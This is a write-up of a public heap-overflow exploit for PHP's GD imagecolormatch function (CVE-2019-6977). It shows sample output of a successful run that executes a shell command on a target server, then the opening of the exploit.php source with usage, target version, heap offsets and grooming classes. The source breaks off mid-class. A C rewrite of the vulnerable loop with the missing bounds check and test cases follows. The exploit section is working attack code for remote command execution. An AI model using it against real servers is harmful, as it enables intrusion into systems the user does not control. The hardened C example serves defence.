PHP GD image-processing library imagecolormatch heap-overflow exploit (CVE-2019-6977)
Vulnerability details: https://nvd.nist.gov/vuln/detail/CVE-2019-6977
Output
GET http://target.com/exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi
Nenuphar.ce: 0x7fe834a10018
Nenuphar2.ce: 0x7fe834a10d70
Nenuphar.properties: 0x7fe834a01230
z.val: 0x7fe834aaea18
Difference: 0xad7e8
Exploit SUCCESSFUL !
The exploit (exploit.php) is as follows:
<?php
# imagecolormatch() OOB Heap Write exploit
# https://bugs.php.net/bug.php?id=77270
# CVE-2019-6977
# Charles Fol
# @cfreal_
#
# Usage: GET/POST /exploit.php?f=&c=
# Example: GET/POST /exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi
#
# Target: PHP 7.2.x
# Tested on: PHP 7.2.12
#
/*
    buf = (unsigned long *)safe_emalloc(sizeof(unsigned long), 5 * im2->colorsTotal, 0);
    for (x=0; x<im1->sx; x++) {
        for( y=0; y<im1->sy; y++ ) {
            color = im2->pixels[y][x];
            rgb = im1->tpixels[y][x];
            bp = buf + (color * 5);
            (*(bp++))++;
            *(bp++) += gdTrueColorGetRed(rgb);
            *(bp++) += gdTrueColorGetGreen(rgb);
            *(bp++) += gdTrueColorGetBlue(rgb);
            *(bp++) += gdTrueColorGetAlpha(rgb);
        }
    }

The buffer is written to by means of a color being the index:

    color = im2->pixels[y][x];
    ..
    bp = buf + (color * 5);
*/
#
# The bug allows us to increment 5 longs located after buf in memory.
# The first long is incremented by one, others by an arbitrary value between 0
# and 0xff.
#
error_reporting(E_ALL);
define('OFFSET_STR_VAL', 0x18);
define('BYTES_PER_COLOR', 0x28);
class Nenuphar extends DOMNode
{
    # Add a property so that std.properties is created
    function __construct()
    {
        $this->x = '1';
    }

    # Define __get
    # => ce->ce_flags & ZEND_ACC_USE_GUARDS == ZEND_ACC_USE_GUARDS
    # => zend_object_properties_size() == 0
    # => sizeof(intern) == 0x50
    function __get($x)
    {
        return $this->$x;
    }
}
class Nenuphar2 extends DOMNode
{
    function __construct()
    {
        $this->x = '2';
    }
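The histogram loop quoted in the exploit's header comment, rewritten in C with the bounds check it lacks. This is an added defensive example, not code from the exploit or from libgd: the Img struct is a simplified stand-in for gdImage (assumed layout), the gdTrueColorGet* macros are inlined as bit masks, and the 2x2 sample images are constructed.

```c
#include <stdlib.h>

#define GD_MAX_COLORS 256  /* gdMaxColors: palette indices are unsigned char */

/* Simplified stand-in for gdImage (assumed layout, not libgd's). */
typedef struct {
    int sx, sy, colorsTotal;
    const unsigned char *pixels;   /* palette indices, row-major (im2) */
    const unsigned int *tpixels;   /* 0xAARRGGBB truecolor pixels (im1) */
} Img;

/* Hardened version of the quoted loop: buf is still sized from colorsTotal,
 * but a palette index >= colorsTotal is rejected (-5) instead of being used
 * to write 5 longs past the end of buf. */
int color_match_hist(const Img *im1, const Img *im2, unsigned long *buf)
{
    if (im2->colorsTotal < 1 || im2->colorsTotal > GD_MAX_COLORS) return -4;
    if (im1->sx != im2->sx || im1->sy != im2->sy) return -3;
    for (int i = 0; i < 5 * im2->colorsTotal; i++) buf[i] = 0;
    for (int x = 0; x < im1->sx; x++)
        for (int y = 0; y < im1->sy; y++) {
            int color = im2->pixels[y * im2->sx + x];
            unsigned int rgb = im1->tpixels[y * im1->sx + x];
            if (color >= im2->colorsTotal) return -5;  /* the missing check */
            unsigned long *bp = buf + color * 5;
            (*bp++)++;                     /* pixel count for this entry */
            *bp++ += (rgb >> 16) & 0xff;   /* gdTrueColorGetRed   */
            *bp++ += (rgb >> 8) & 0xff;    /* gdTrueColorGetGreen */
            *bp++ += rgb & 0xff;           /* gdTrueColorGetBlue  */
            *bp++ += (rgb >> 24) & 0x7f;   /* gdTrueColorGetAlpha (7 bits) */
        }
    return 0;
}

/* Constructed 2x2 inputs: red, green, blue and alpha-only truecolor pixels. */
static const unsigned int TP[4] = {0x00FF0000, 0x0000FF00, 0x000000FF, 0x7F000000};
static const unsigned char PX_OK[4]  = {0, 1, 1, 0};      /* all indices < 2 */
static const unsigned char PX_BAD[4] = {0xAA, 0xAA, 0xAA, 0xAA}; /* beyond a 1-entry palette */

int run_valid_case(unsigned long hist[10])
{
    Img im1 = {2, 2, 0, NULL, TP}, im2 = {2, 2, 2, PX_OK, NULL};
    return color_match_hist(&im1, &im2, hist);
}

int run_crafted_case(void)
{
    unsigned long hist[5];  /* 5 * colorsTotal, exactly what the original allocates */
    Img im1 = {2, 2, 0, NULL, TP}, im2 = {2, 2, 1, PX_BAD, NULL};
    return color_match_hist(&im1, &im2, hist);
}
```

With the check in place the crafted palette image fails closed with -5 and hist[5] is never indexed past its end; the valid case yields two pixels per palette entry with the expected channel sums.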